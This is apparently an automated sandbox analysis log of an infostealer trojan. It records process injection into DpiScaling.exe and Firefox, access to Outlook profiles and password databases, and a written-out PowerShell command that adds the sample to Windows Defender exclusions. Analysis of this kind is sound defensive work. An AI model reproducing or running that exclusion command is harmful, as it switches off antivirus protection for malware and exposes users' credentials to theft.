Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047EDAC6	11_2_047EDAC6
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047DDAAC	11_2_047DDAAC
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_04785AA0	11_2_04785AA0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047E1AA3	11_2_047E1AA3
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047FFB76	11_2_047FFB76
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_047B5BF0	11_2_047B5BF0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0477DBF9	11_2_0477DBF9
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0475FB80	11_2_0475FB80
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_00692560	11_2_00692560
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_006AC290	11_2_006AC290
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0068D430	11_2_0068D430
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0068B646	11_2_0068B646
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0068B650	11_2_0068B650
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0068D650	11_2_0068D650
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0068B7A0	11_2_0068B7A0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0068B795	11_2_0068B795
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_0068B868	11_2_0068B868
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_00695C10	11_2_00695C10
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_00693DFC	11_2_00693DFC
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_00693E00	11_2_00693E00
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_045CE69C	11_2_045CE69C
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_045CD768	11_2_045CD768
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_045CE1E8	11_2_045CE1E8
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_045D51AC	11_2_045D51AC
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_045D534D	11_2_045D534D
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 11_2_045CE303	11_2_045CE303

Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: String function: 0472B970 appears 280 times
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: String function: 047AEA12 appears 86 times
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: String function: 04775130 appears 58 times
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: String function: 04787E54 appears 111 times
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: String function: 047BF290 appears 105 times
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: String function: 01A3EA12 appears 86 times
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: String function: 01A05130 appears 58 times
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: String function: 01A17E54 appears 102 times
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: String function: 019BB970 appears 280 times
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: String function: 01A4F290 appears 105 times

Source: SLq0ulC3Wf.exe, 00000000.00000002.1454536799.0000000007610000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs SLq0ulC3Wf.exe
Source: SLq0ulC3Wf.exe, 00000000.00000002.1435217400.0000000003422000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs SLq0ulC3Wf.exe
Source: SLq0ulC3Wf.exe, 00000000.00000002.1457995652.00000000076D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerS vs SLq0ulC3Wf.exe
Source: SLq0ulC3Wf.exe, 00000000.00000000.1414130794.0000000000EB2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameLlLJ.exeL vs SLq0ulC3Wf.exe
Source: SLq0ulC3Wf.exe, 00000000.00000002.1434024897.000000000143E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SLq0ulC3Wf.exe
Source: SLq0ulC3Wf.exe, 00000000.00000002.1460765259.0000000007830000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs SLq0ulC3Wf.exe
Source: SLq0ulC3Wf.exe, 00000007.00000002.1718110986.0000000001ABD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs SLq0ulC3Wf.exe
Source: SLq0ulC3Wf.exe, 00000007.00000002.1717907808.0000000001537000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDPISCALING.EXEj% vs SLq0ulC3Wf.exe
Source: SLq0ulC3Wf.exe	Binary or memory string: OriginalFilenameLlLJ.exeL vs SLq0ulC3Wf.exe

Source: SLq0ulC3Wf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SLq0ulC3Wf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@15/7@7/6

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SLq0ulC3Wf.exe.log

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vblqtist.oon.ps1

Jump to behavior

Source: SLq0ulC3Wf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SLq0ulC3Wf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DpiScaling.exe, 0000000B.00000003.1937323801.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, DpiScaling.exe, 0000000B.00000002.2677152711.0000000002BB6000.00000004.00000020.00020000.00000000.sdmp, DpiScaling.exe, 0000000B.00000003.1939524205.0000000002B92000.00000004.00000020.00020000.00000000.sdmp, DpiScaling.exe, 0000000B.00000002.2677152711.0000000002B65000.00000004.00000020.00020000.00000000.sdmp, DpiScaling.exe, 0000000B.00000002.2677152711.0000000002B87000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SLq0ulC3Wf.exe	Virustotal: Detection: 76%
Source: SLq0ulC3Wf.exe	ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\SLq0ulC3Wf.exe "C:\Users\user\Desktop\SLq0ulC3Wf.exe"
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SLq0ulC3Wf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process created: C:\Users\user\Desktop\SLq0ulC3Wf.exe "C:\Users\user\Desktop\SLq0ulC3Wf.exe"
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process created: C:\Users\user\Desktop\SLq0ulC3Wf.exe "C:\Users\user\Desktop\SLq0ulC3Wf.exe"
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process created: C:\Users\user\Desktop\SLq0ulC3Wf.exe "C:\Users\user\Desktop\SLq0ulC3Wf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	Process created: C:\Windows\SysWOW64\DpiScaling.exe "C:\Windows\SysWOW64\DpiScaling.exe"
Source: C:\Windows\SysWOW64\DpiScaling.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SLq0ulC3Wf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process created: C:\Users\user\Desktop\SLq0ulC3Wf.exe "C:\Users\user\Desktop\SLq0ulC3Wf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process created: C:\Users\user\Desktop\SLq0ulC3Wf.exe "C:\Users\user\Desktop\SLq0ulC3Wf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Process created: C:\Users\user\Desktop\SLq0ulC3Wf.exe "C:\Users\user\Desktop\SLq0ulC3Wf.exe"	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	Process created: C:\Windows\SysWOW64\DpiScaling.exe "C:\Windows\SysWOW64\DpiScaling.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DpiScaling.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\DpiScaling.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: SLq0ulC3Wf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SLq0ulC3Wf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aVqyFNVyPiTfi.exe, 0000000A.00000002.2677321195.0000000000EDE000.00000002.00000001.01000000.0000000C.sdmp, aVqyFNVyPiTfi.exe, 0000000C.00000002.2678560220.0000000000EDE000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: SLq0ulC3Wf.exe, 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, DpiScaling.exe, 0000000B.00000003.1745690316.00000000043A5000.00000004.00000020.00020000.00000000.sdmp, DpiScaling.exe, 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, DpiScaling.exe, 0000000B.00000003.1748153524.000000000455A000.00000004.00000020.00020000.00000000.sdmp, DpiScaling.exe, 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: SLq0ulC3Wf.exe, SLq0ulC3Wf.exe, 00000007.00000002.1718110986.0000000001990000.00000040.00001000.00020000.00000000.sdmp, DpiScaling.exe, DpiScaling.exe, 0000000B.00000003.1745690316.00000000043A5000.00000004.00000020.00020000.00000000.sdmp, DpiScaling.exe, 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, DpiScaling.exe, 0000000B.00000003.1748153524.000000000455A000.00000004.00000020.00020000.00000000.sdmp, DpiScaling.exe, 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: DpiScaling.pdb source: SLq0ulC3Wf.exe, 00000007.00000002.1717907808.0000000001537000.00000004.00000020.00020000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000A.00000003.1963997440.0000000000C9B000.00000004.00000001.00020000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000A.00000002.2676810505.0000000000C88000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: DpiScaling.pdbGCTL source: SLq0ulC3Wf.exe, 00000007.00000002.1717907808.0000000001537000.00000004.00000020.00020000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000A.00000003.1963997440.0000000000C9B000.00000004.00000001.00020000.00000000.sdmp, aVqyFNVyPiTfi.exe, 0000000A.00000002.2676810505.0000000000C88000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 0_2_016BF028 pushad ; iretd	0_2_016BF029
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 0_2_0780EFE6 push es; iretd	0_2_0780EFE7
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 0_2_07806C39 pushfd ; iretd	0_2_07806C3D
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 0_2_07805AE5 pushfd ; iretd	0_2_07805AE6
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_0041987C push ss; ret	7_2_00419884
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_00412008 push edi; iretd	7_2_00412014
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_00418158 push ebp; iretd	7_2_00418159
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_0041B1C1 push esp; ret	7_2_0041B1C5
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_0041524A push ebp; iretd	7_2_0041527D
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_00407258 push eax; retf	7_2_004072E0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_00407233 push eax; retf	7_2_004072E0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_004072E1 push eax; retf	7_2_004072E0
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_0041F373 push edi; iretd	7_2_0041F37F
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_00403310 push eax; ret	7_2_00403312
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_0040AB25 push esp; ret	7_2_0040AB26
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_00412C0F push ebx; iretd	7_2_00412C2B
Source: C:\Users\user\Desktop\SLq0ulC3Wf.exe	Code function: 7_2_00418E56 pushfd ; iretd	7_2_00418E99
